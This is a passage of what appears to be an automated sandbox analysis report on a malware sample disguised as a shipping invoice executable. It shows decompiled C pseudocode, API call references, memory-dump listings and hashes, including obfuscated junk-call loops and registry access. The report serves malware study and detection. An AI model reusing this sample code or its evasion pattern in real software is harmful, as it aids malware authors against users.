                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3748168415-3916222277
                                                                                                                                    • Opcode ID: d3251c14134478d2d59c94d69b6c29095ae239f289e1cb20b942a85f63b4625b
                                                                                                                                    • Instruction ID: 7ad44c5dbd4f0c22509592cdf29d01bef16ea56332e5e379f7ee7dd57f249553
                                                                                                                                    • Opcode Fuzzy Hash: d3251c14134478d2d59c94d69b6c29095ae239f289e1cb20b942a85f63b4625b
                                                                                                                                    • Instruction Fuzzy Hash: EA019E3120060CAFDF209F50ED84E5B3765EF84350F64003BFA00761D0C73A9892AE1E
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                    			E0040604D(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
                                                                                                                                    				int _v8;
                                                                                                                                    				long _t21;
                                                                                                                                    				long _t24;
                                                                                                                                    				char* _t30;
                                                                                                                                    
                                                                                                                                    				asm("sbb eax, eax");
                                                                                                                                    				_v8 = 0x400;
                                                                                                                                    				_t21 = E00405FEC(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                                                                                                                    				_t30 = _a16;
                                                                                                                                    				if(_t21 != 0) {
                                                                                                                                    					L4:
                                                                                                                                    					 *_t30 =  *_t30 & 0x00000000;
                                                                                                                                    				} else {
                                                                                                                                    					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                                                                                                                    					_t21 = RegCloseKey(_a20);
                                                                                                                                    					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
                                                                                                                                    					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                                                                                                    						goto L4;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				return _t21;
                                                                                                                                    			}








                                                                                                                                    APIs
                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent,0042A078,?,?,?,00000002,C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent,?,00406291,80000002), ref: 00406093
                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,00406291,80000002,Software\Microsoft\Windows\CurrentVersion,C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent,C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent,C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent,?,0042A078), ref: 0040609E
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent, xrefs: 00406050, 00406084
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseQueryValue
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent
                                                                                                                                    • API String ID: 3356406503-2399012098
                                                                                                                                    • Opcode ID: fbc34f94f804cf7f8ceee3a94302c0ccfb61d5b85e95000fdd84f5b54f9224ff
                                                                                                                                    • Instruction ID: e4f1e7439589972fcf118c5c53cdbc31cfa5ab0eeff8e2f1e96dc9b6b94aebae
                                                                                                                                    • Opcode Fuzzy Hash: fbc34f94f804cf7f8ceee3a94302c0ccfb61d5b85e95000fdd84f5b54f9224ff
                                                                                                                                    • Instruction Fuzzy Hash: B5019A72540209AADF22CF60CC09FDB3BACEF04360F00802AF905A6191D278C924CBA9
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00405B45(char* _a4) {
                                                                                                                                    				char* _t3;
                                                                                                                                    				char* _t5;
                                                                                                                                    
                                                                                                                                    				_t5 = _a4;
                                                                                                                                    				_t3 =  &(_t5[lstrlenA(_t5)]);
                                                                                                                                    				while( *_t3 != 0x5c) {
                                                                                                                                    					_t3 = CharPrevA(_t5, _t3);
                                                                                                                                    					if(_t3 > _t5) {
                                                                                                                                    						continue;
                                                                                                                                    					}
                                                                                                                                    					break;
                                                                                                                                    				}
                                                                                                                                    				 *_t3 =  *_t3 & 0x00000000;
                                                                                                                                    				return  &(_t3[1]);
                                                                                                                                    			}






                                                                                                                                    APIs
                                                                                                                                    • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402E80,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe,C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe,80000000,00000003), ref: 00405B4B
                                                                                                                                    • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E80,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe,C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe,80000000,00000003), ref: 00405B59
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CharPrevlstrlen
                                                                                                                                    • String ID: C:\Users\user\Desktop
                                                                                                                                    • API String ID: 2709904686-224404859
                                                                                                                                    • Opcode ID: 4402843b33e5109e67992b99d0281bb7e81fac819ebae0ac34b6d7d52c4d849b
                                                                                                                                    • Instruction ID: aef4662ac69de026c31068fc7e73e23b4f893d7ca3339188f0f4dd73349a8212
                                                                                                                                    • Opcode Fuzzy Hash: 4402843b33e5109e67992b99d0281bb7e81fac819ebae0ac34b6d7d52c4d849b
                                                                                                                                    • Instruction Fuzzy Hash: 2DD0C772819D706EE30366149D04F9F7AA8DF17701F090466E181A7191C67C6D4247FD
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00405C64(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                                                                                                    				int _v8;
                                                                                                                                    				int _t12;
                                                                                                                                    				int _t14;
                                                                                                                                    				int _t15;
                                                                                                                                    				CHAR* _t17;
                                                                                                                                    				CHAR* _t27;
                                                                                                                                    
                                                                                                                                    				_t12 = lstrlenA(_a8);
                                                                                                                                    				_t27 = _a4;
                                                                                                                                    				_v8 = _t12;
                                                                                                                                    				while(lstrlenA(_t27) >= _v8) {
                                                                                                                                    					_t14 = _v8;
                                                                                                                                    					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                                                                                                    					_t15 = lstrcmpiA(_t27, _a8);
                                                                                                                                    					_t27[_v8] =  *(_t14 + _t27);
                                                                                                                                    					if(_t15 == 0) {
                                                                                                                                    						_t17 = _t27;
                                                                                                                                    					} else {
                                                                                                                                    						_t27 = CharNextA(_t27);
                                                                                                                                    						continue;
                                                                                                                                    					}
                                                                                                                                    					L5:
                                                                                                                                    					return _t17;
                                                                                                                                    				}
                                                                                                                                    				_t17 = 0;
                                                                                                                                    				goto L5;
                                                                                                                                    			}










                                                                                                                                    APIs
                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405EBF,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C74
                                                                                                                                    • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405EBF,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C8C
                                                                                                                                    • CharNextA.USER32(00000000,?,00000000,00405EBF,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C9D
                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00405EBF,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CA6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 190613189-0
                                                                                                                                    • Opcode ID: 62ddd0860e25498249f603dfcc8213b483479843cbbb52d6d221ef9dbd1560f9
                                                                                                                                    • Instruction ID: 4edc00b8cb5e942f0ed7daaa4efcd0f164f2627ad15681bfc3fbf6db0833b908
                                                                                                                                    • Opcode Fuzzy Hash: 62ddd0860e25498249f603dfcc8213b483479843cbbb52d6d221ef9dbd1560f9
                                                                                                                                    • Instruction Fuzzy Hash: D0F0C232105918BFDB02DFA4DD00D9EBBA8EF46254B2540BAE841F7211D638DE019B98
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Executed Functions

                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                    			E10001BB0() {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				char _v68;
                                                                                                                                    				intOrPtr _v72;
                                                                                                                                    				intOrPtr _v76;
                                                                                                                                    				char _v78;
                                                                                                                                    				char _v80;
                                                                                                                                    				char _v84;
                                                                                                                                    				intOrPtr _v88;
                                                                                                                                    				intOrPtr _v92;
                                                                                                                                    				char _v96;
                                                                                                                                    				char _v97;
                                                                                                                                    				char _v102;
                                                                                                                                    				char _v103;
                                                                                                                                    				char _v108;
                                                                                                                                    				intOrPtr _v112;
                                                                                                                                    				intOrPtr _v116;
                                                                                                                                    				char _v120;
                                                                                                                                    				char _v124;
                                                                                                                                    				intOrPtr _v128;
                                                                                                                                    				intOrPtr _v132;
                                                                                                                                    				char _v134;
                                                                                                                                    				char _v136;
                                                                                                                                    				char _v140;
                                                                                                                                    				char _v144;
                                                                                                                                    				char _v146;
                                                                                                                                    				char _v148;
                                                                                                                                    				char _v152;
                                                                                                                                    				char _v156;
                                                                                                                                    				char _v164;
                                                                                                                                    				intOrPtr _v168;
                                                                                                                                    				intOrPtr _v172;
                                                                                                                                    				char _v176;
                                                                                                                                    				char _v180;
                                                                                                                                    				void* _v184;
                                                                                                                                    				void* _v188;
                                                                                                                                    				char _v192;
                                                                                                                                    				void* _v196;
                                                                                                                                    				char _v197;
                                                                                                                                    				char _v198;
                                                                                                                                    				char _v199;
                                                                                                                                    				long _v200;
                                                                                                                                    				char _v201;
                                                                                                                                    				char _v203;
                                                                                                                                    				char _v204;
                                                                                                                                    				char _v208;
                                                                                                                                    				char _v210;
                                                                                                                                    				char _v211;
                                                                                                                                    				char _v212;
                                                                                                                                    				char _v213;
                                                                                                                                    				char _v216;
                                                                                                                                    				char _v217;
                                                                                                                                    				char _v218;
                                                                                                                                    				char _v219;
                                                                                                                                    				char _v220;
                                                                                                                                    				char _v236;
                                                                                                                                    				void* _v240;
                                                                                                                                    				void* _v244;
                                                                                                                                    				void _v248;
                                                                                                                                    				long _v252;
                                                                                                                                    				long _v256;
                                                                                                                                    				void* __ebx;
                                                                                                                                    				void* __edi;
                                                                                                                                    				void* __esi;
                                                                                                                                    				signed int _t195;
                                                                                                                                    				void* _t197;
                                                                                                                                    				signed int _t198;
                                                                                                                                    				signed int _t199;
                                                                                                                                    				signed int _t200;
                                                                                                                                    				char _t201;
                                                                                                                                    				int _t202;
                                                                                                                                    				char* _t209;
                                                                                                                                    				intOrPtr _t214;
                                                                                                                                    				char _t215;
                                                                                                                                    				intOrPtr _t223;
                                                                                                                                    				intOrPtr _t224;
                                                                                                                                    				char _t225;
                                                                                                                                    				intOrPtr _t226;
                                                                                                                                    				signed int _t238;
                                                                                                                                    				char* _t247;
                                                                                                                                    				intOrPtr _t252;
                                                                                                                                    				char _t253;
                                                                                                                                    				intOrPtr _t261;
                                                                                                                                    				intOrPtr _t262;
                                                                                                                                    				char _t263;
                                                                                                                                    				intOrPtr _t264;
                                                                                                                                    				void* _t275;
                                                                                                                                    				short _t276;
                                                                                                                                    				signed int _t277;
                                                                                                                                    				signed short _t278;
                                                                                                                                    				intOrPtr _t279;
                                                                                                                                    				char _t280;
                                                                                                                                    				intOrPtr _t281;
                                                                                                                                    				short _t282;
                                                                                                                                    				signed int _t283;
                                                                                                                                    				intOrPtr _t286;
                                                                                                                                    				intOrPtr _t287;
                                                                                                                                    				_Unknown_base(*)()* _t288;
                                                                                                                                    				void* _t289;
                                                                                                                                    				void* _t290;
                                                                                                                                    				signed int _t291;
                                                                                                                                    				signed int _t292;
                                                                                                                                    				void* _t293;
                                                                                                                                    				short _t294;
                                                                                                                                    				signed short _t296;
                                                                                                                                    				short _t297;
                                                                                                                                    				short _t298;
                                                                                                                                    				intOrPtr _t299;
                                                                                                                                    				intOrPtr* _t300;
                                                                                                                                    				signed int _t301;
                                                                                                                                    				signed int _t303;
                                                                                                                                    				signed int _t305;
                                                                                                                                    				signed int _t306;
                                                                                                                                    				void* _t307;
                                                                                                                                    				intOrPtr _t308;
                                                                                                                                    				intOrPtr _t309;
                                                                                                                                    				signed int _t311;
                                                                                                                                    				void* _t312;
                                                                                                                                    				signed short _t316;
                                                                                                                                    				signed short _t319;
                                                                                                                                    				signed short _t323;
                                                                                                                                    				signed int _t325;
                                                                                                                                    				signed short _t330;
                                                                                                                                    				signed short _t334;
                                                                                                                                    				intOrPtr* _t341;
                                                                                                                                    				short _t342;
                                                                                                                                    				void* _t347;
                                                                                                                                    				signed int _t361;
                                                                                                                                    				signed int _t364;
                                                                                                                                    				char _t365;
                                                                                                                                    				char _t366;
                                                                                                                                    				intOrPtr _t367;
                                                                                                                                    				intOrPtr _t368;
                                                                                                                                    				char _t376;
                                                                                                                                    				char _t377;
                                                                                                                                    				char _t381;
                                                                                                                                    				intOrPtr _t383;
                                                                                                                                    				char _t384;
                                                                                                                                    				short _t392;
                                                                                                                                    				char _t399;
                                                                                                                                    				char _t400;
                                                                                                                                    				char _t404;
                                                                                                                                    				intOrPtr _t406;
                                                                                                                                    				char _t407;
                                                                                                                                    				void* _t415;
                                                                                                                                    				signed int _t416;
                                                                                                                                    				intOrPtr _t417;
                                                                                                                                    				intOrPtr _t418;
                                                                                                                                    				short _t419;
                                                                                                                                    				signed int _t421;
                                                                                                                                    				signed int _t423;
                                                                                                                                    				signed int _t424;
                                                                                                                                    				signed short _t426;
                                                                                                                                    				void* _t427;
                                                                                                                                    				char _t429;
                                                                                                                                    				signed int _t430;
                                                                                                                                    				intOrPtr _t431;
                                                                                                                                    				intOrPtr _t432;
                                                                                                                                    				intOrPtr _t433;
                                                                                                                                    				void* _t434;
                                                                                                                                    				char _t435;
                                                                                                                                    				char _t436;
                                                                                                                                    				void* _t437;
                                                                                                                                    				intOrPtr _t438;
                                                                                                                                    				char _t441;
                                                                                                                                    				signed int _t442;
                                                                                                                                    				signed short _t444;
                                                                                                                                    				signed int _t446;
                                                                                                                                    				void* _t447;
                                                                                                                                    				intOrPtr _t448;
                                                                                                                                    				signed short _t458;
                                                                                                                                    				char _t459;
                                                                                                                                    				signed short _t462;
                                                                                                                                    				signed int _t464;
                                                                                                                                    				void* _t466;
                                                                                                                                    				intOrPtr _t467;
                                                                                                                                    				intOrPtr _t468;
                                                                                                                                    				intOrPtr _t478;
                                                                                                                                    				char _t479;
                                                                                                                                    				intOrPtr _t483;
                                                                                                                                    				char _t484;
                                                                                                                                    				char _t485;
                                                                                                                                    				intOrPtr _t486;
                                                                                                                                    				intOrPtr _t501;
                                                                                                                                    				char _t502;
                                                                                                                                    				intOrPtr _t506;
                                                                                                                                    				long _t507;
                                                                                                                                    				char _t508;
                                                                                                                                    				intOrPtr _t509;
                                                                                                                                    				void* _t517;
                                                                                                                                    				signed int _t519;
                                                                                                                                    				char _t520;
                                                                                                                                    				signed int _t521;
                                                                                                                                    				signed int _t522;
                                                                                                                                    				intOrPtr _t523;
                                                                                                                                    				void* _t524;
                                                                                                                                    				void* _t528;
                                                                                                                                    				signed int _t530;
                                                                                                                                    				void* _t531;
                                                                                                                                    				intOrPtr _t532;
                                                                                                                                    				void* _t533;
                                                                                                                                    				intOrPtr _t534;
                                                                                                                                    				void* _t535;
                                                                                                                                    				void* _t536;
                                                                                                                                    				short _t538;
                                                                                                                                    				struct HINSTANCE__* _t539;
                                                                                                                                    				intOrPtr _t541;
                                                                                                                                    				signed char _t543;
                                                                                                                                    				signed short _t550;
                                                                                                                                    				intOrPtr _t559;
                                                                                                                                    				intOrPtr* _t563;
                                                                                                                                    				short _t565;
                                                                                                                                    				intOrPtr _t566;
                                                                                                                                    				void* _t568;
                                                                                                                                    				signed short _t569;
                                                                                                                                    				signed int _t574;
                                                                                                                                    				signed short _t575;
                                                                                                                                    				intOrPtr _t576;
                                                                                                                                    				intOrPtr _t577;
                                                                                                                                    				intOrPtr _t578;
                                                                                                                                    				void* _t583;
                                                                                                                                    				intOrPtr _t584;
                                                                                                                                    				signed int _t585;
                                                                                                                                    				signed int _t586;
                                                                                                                                    				signed short _t587;
                                                                                                                                    				intOrPtr _t588;
                                                                                                                                    				void* _t590;
                                                                                                                                    				intOrPtr _t591;
                                                                                                                                    				signed int _t597;
                                                                                                                                    				intOrPtr _t598;
                                                                                                                                    				short _t599;
                                                                                                                                    				signed int _t600;
                                                                                                                                    				signed short _t602;
                                                                                                                                    				signed int _t603;
                                                                                                                                    				signed int _t605;
                                                                                                                                    				void* _t609;
                                                                                                                                    
                                                                                                                                    				_t605 = (_t603 & 0xfffffff8) - 0x8c;
                                                                                                                                    				_t195 =  *0x1000e420; // 0x44ea7bf2
                                                                                                                                    				_v8 = _t195 ^ _t605;
                                                                                                                                    				_t365 =  *0x1000e236;
                                                                                                                                    				_t197 = 0x188;
                                                                                                                                    				 *0x1000f0e8 = 0;
                                                                                                                                    				_v103 = 0x61;
                                                                                                                                    				_t466 = 0x1a5;
                                                                                                                                    				if(_t365 > 0x188) {
                                                                                                                                    					L3:
                                                                                                                                    					_t198 =  *0x1000e364; // 0x47
                                                                                                                                    					_t199 = _t198 ^  *0x1000e244;
                                                                                                                                    					_v102 = 0x6c;
                                                                                                                                    					_t609 =  *0x1000e2d4 - _t199; // 0x8f
                                                                                                                                    					if(_t609 <= 0) {
                                                                                                                                    						 *0x1000e189 = 0xb0;
                                                                                                                                    					}
                                                                                                                                    					_v97 = 0x63;
                                                                                                                                    					if( *0x1000e328 != 0) {
                                                                                                                                    						_t464 =  *0x1000e3c8; // 0x140
                                                                                                                                    						if((_t464 ^ 0x000006bc) != 0) {
                                                                                                                                    							 *0x1000ded8 = 0xa6;
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					_t200 =  *0x1000dfd0 & 0x0000ffff;
                                                                                                                                    					_t467 =  *0x1000e04c; // 0x161
                                                                                                                                    					_t366 = 0x33;
                                                                                                                                    					L9:
                                                                                                                                    					if(_t366 == 0x910 || _t200 == 0x125) {
                                                                                                                                    						_t200 = _t200 + 1;
                                                                                                                                    						 *0x1000e294 = 0xc5;
                                                                                                                                    						 *0x1000e2d8 = 9;
                                                                                                                                    						_t366 = _t366 + _t467;
                                                                                                                                    						goto L9;
                                                                                                                                    					}
                                                                                                                                    					_t468 =  *0x1000df30; // 0x20
                                                                                                                                    					__eflags = _t468 !=  *0x1000e01c;
                                                                                                                                    					if(_t468 !=  *0x1000e01c) {
                                                                                                                                    						__eflags =  !( *0x1000e150) ^  *0x1000e39c;
                                                                                                                                    						if(( !( *0x1000e150) ^  *0x1000e39c) != 0) {
                                                                                                                                    							 *0x1000e2ed = 0xda;
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					_t367 =  *0x1000df08;
                                                                                                                                    					_t201 =  *0x1000def1;
                                                                                                                                    					__eflags = _t367 - _t201;
                                                                                                                                    					if(_t367 > _t201) {
                                                                                                                                    						L18:
                                                                                                                                    						_t368 =  *0x1000e240; // 0x6a
                                                                                                                                    						__eflags = _t368 -  *0x1000e148; // 0x1d4
                                                                                                                                    						if(__eflags < 0) {
                                                                                                                                    							 *0x1000e05d = 0x45;
                                                                                                                                    						}
                                                                                                                                    						_t563 = __imp__#3; // 0x73eced70
                                                                                                                                    						_t341 = __imp__CoRevokeClassObject;
                                                                                                                                    						_t202 = 0x86;
                                                                                                                                    						_v144 = 0x14a;
                                                                                                                                    						_v140 = 0x86;
                                                                                                                                    						_v136 = 0xc1;
                                                                                                                                    						_v132 = 0x4be;
                                                                                                                                    						while(1) {
                                                                                                                                    							RegCreateKeyExW( &_v136, L"CloseFarmhouse32", _t202, L"_DrawPossible64", _t202,  &_v136,  &_v120,  &_v140,  &_v136);
                                                                                                                                    							 *_t563( &_v144);
                                                                                                                                    							 *_t341(_v148);
                                                                                                                                    							__imp__CoFileTimeNow( &_v148);
                                                                                                                                    							_t209 =  &_v156;
                                                                                                                                    							__imp__CoInitializeSecurity( &_v152, _t209, _t209,  &_v148, _v156, _v148,  &_v152, _v152,  &_v156);
                                                                                                                                    							CreatePrivateObjectSecurity( &_v184,  &_v192,  &_v192,  &_v184,  &_v192, _t210); // executed
                                                                                                                                    							DisconnectNamedPipe( &_v184);
                                                                                                                                    							_t376 = "SeemNicotinamide32"; // 0x6d656553
                                                                                                                                    							_t478 = M1000A1F4; // 0x6f63694e
                                                                                                                                    							_t214 = M1000A1F8; // 0x616e6974
                                                                                                                                    							_v96 = _t376;
                                                                                                                                    							_t377 = M1000A1FC; // 0x6564696d
                                                                                                                                    							_v92 = _t478;
                                                                                                                                    							_t479 =  *0x1000a200; // 0x3233
                                                                                                                                    							_v84 = _t377;
                                                                                                                                    							_v88 = _t214;
                                                                                                                                    							_t215 =  *0x1000a202; // 0x0
                                                                                                                                    							_v80 = _t479;
                                                                                                                                    							_v78 = _t215;
                                                                                                                                    							EnumResourceNamesA( &_v192,  &_v96,  &_v188,  &_v184); // executed
                                                                                                                                    							EnumResourceTypesW( &_v196,  &_v196,  &_v188);
                                                                                                                                    							LockFile( &_v192, _v192, _v200, _v200, _v200);
                                                                                                                                    							_t381 = "StandMarmite"; // 0x6e617453
                                                                                                                                    							_t483 = M1000A1E4; // 0x72614d64
                                                                                                                                    							_t223 =  *0x1000a1e8; // 0x6574696d
                                                                                                                                    							_v136 = _t381;
                                                                                                                                    							_v132 = _t483;
                                                                                                                                    							_t484 = "TakePenult32"; // 0x656b6154
                                                                                                                                    							_v128 = _t223;
                                                                                                                                    							_t224 = M1000A1D4; // 0x756e6550
                                                                                                                                    							_v124 =  *0x1000a1ec & 0x000000ff;
                                                                                                                                    							_t383 =  *0x1000a1d8; // 0x3233746c
                                                                                                                                    							_v120 = _t484;
                                                                                                                                    							_t485 =  *0x1000a1dc; // 0x0
                                                                                                                                    							_v116 = _t224;
                                                                                                                                    							_t225 = "EnumMicrophyte32"; // 0x6d756e45
                                                                                                                                    							_v112 = _t383;
                                                                                                                                    							_t384 = M1000A1C0; // 0x7263694d
                                                                                                                                    							_v108 = _t485;
                                                                                                                                    							_t486 = M1000A1C4; // 0x7968706f
                                                                                                                                    							_v84 = _t225;
                                                                                                                                    							_t226 =  *0x1000a1c8; // 0x32336574
                                                                                                                                    							_v80 = _t384;
                                                                                                                                    							_v76 = _t486;
                                                                                                                                    							_v72 = _t226;
                                                                                                                                    							_v68 =  *0x1000a1cc & 0x000000ff;
                                                                                                                                    							LookupPrivilegeDisplayNameA( &_v136,  &_v120,  &_v84,  &_v196,  &_v200); // executed
                                                                                                                                    							ReadEventLogW( &_v200, _v196, _v200,  &_v200, _v200,  &_v200,  &_v192);
                                                                                                                                    							SetupComm( &_v200, _v200, _v192);
                                                                                                                                    							WriteFile( &_v192,  &_v192, _v200,  &_v200,  &_v200);
                                                                                                                                    							_t71 =  &_v188;
                                                                                                                                    							 *_t71 = _v188 - 1;
                                                                                                                                    							__eflags =  *_t71;
                                                                                                                                    							if( *_t71 == 0) {
                                                                                                                                    								break;
                                                                                                                                    							}
                                                                                                                                    							_t202 = _v196;
                                                                                                                                    						}
                                                                                                                                    						__eflags =  *0x1000e2d4 -  *0x1000e21c;
                                                                                                                                    						_v144 = 0x65;
                                                                                                                                    						_v146 = 0x72;
                                                                                                                                    						if( *0x1000e2d4 <  *0x1000e21c) {
                                                                                                                                    							 *0x1000e0e8 = 0x640;
                                                                                                                                    						}
                                                                                                                                    						_t238 =  *0x1000e020 & 0x0000ffff;
                                                                                                                                    						_t392 =  *0x1000e148; // 0x1d4
                                                                                                                                    						__eflags = _t238 - _t392;
                                                                                                                                    						if(_t238 > _t392) {
                                                                                                                                    							L28:
                                                                                                                                    							_v188 = 0x4be;
                                                                                                                                    							do {
                                                                                                                                    								RegCreateKeyExW( &_v192, L"CloseFarmhouse32", _v196, L"_DrawPossible64", _v196,  &_v192,  &_v176,  &_v196,  &_v192);
                                                                                                                                    								 *_t563( &_v200);
                                                                                                                                    								 *_t341(_v204);
                                                                                                                                    								__imp__CoFileTimeNow( &_v204);
                                                                                                                                    								_t247 =  &_v212;
                                                                                                                                    								__imp__CoInitializeSecurity( &_v208, _t247, _t247,  &_v204, _v212, _v204,  &_v208, _v208,  &_v212);
                                                                                                                                    								CreatePrivateObjectSecurity( &_v240,  &_v248,  &_v248,  &_v240,  &_v248,  &_v248); // executed
                                                                                                                                    								DisconnectNamedPipe( &_v240);
                                                                                                                                    								_t399 = "SeemNicotinamide32"; // 0x6d656553
                                                                                                                                    								_t501 = M1000A1F4; // 0x6f63694e
                                                                                                                                    								_t252 = M1000A1F8; // 0x616e6974
                                                                                                                                    								_v152 = _t399;
                                                                                                                                    								_t400 = M1000A1FC; // 0x6564696d
                                                                                                                                    								_v148 = _t501;
                                                                                                                                    								_t502 =  *0x1000a200; // 0x3233
                                                                                                                                    								_v140 = _t400;
                                                                                                                                    								_v144 = _t252;
                                                                                                                                    								_t253 =  *0x1000a202; // 0x0
                                                                                                                                    								_v136 = _t502;
                                                                                                                                    								_v134 = _t253;
                                                                                                                                    								EnumResourceNamesA( &_v248,  &_v152,  &_v244,  &_v240);
                                                                                                                                    								EnumResourceTypesW( &_v252,  &_v252,  &_v244);
                                                                                                                                    								LockFile( &_v248, _v248, _v256, _v256, _v256);
                                                                                                                                    								_t404 = "StandMarmite"; // 0x6e617453
                                                                                                                                    								_t506 = M1000A1E4; // 0x72614d64
                                                                                                                                    								_t261 =  *0x1000a1e8; // 0x6574696d
                                                                                                                                    								_v176 = _t404;
                                                                                                                                    								_v172 = _t506;
                                                                                                                                    								_t507 = "TakePenult32"; // 0x656b6154
                                                                                                                                    								_v168 = _t261;
                                                                                                                                    								_t262 = M1000A1D4; // 0x756e6550
                                                                                                                                    								_v164 =  *0x1000a1ec & 0x000000ff;
                                                                                                                                    								_t406 =  *0x1000a1d8; // 0x3233746c
                                                                                                                                    								_v192 = _t507;
                                                                                                                                    								_t508 =  *0x1000a1dc; // 0x0
                                                                                                                                    								_v188 = _t262;
                                                                                                                                    								_t263 = "EnumMicrophyte32"; // 0x6d756e45
                                                                                                                                    								_v184 = _t406;
                                                                                                                                    								_t407 = M1000A1C0; // 0x7263694d
                                                                                                                                    								_v180 = _t508;
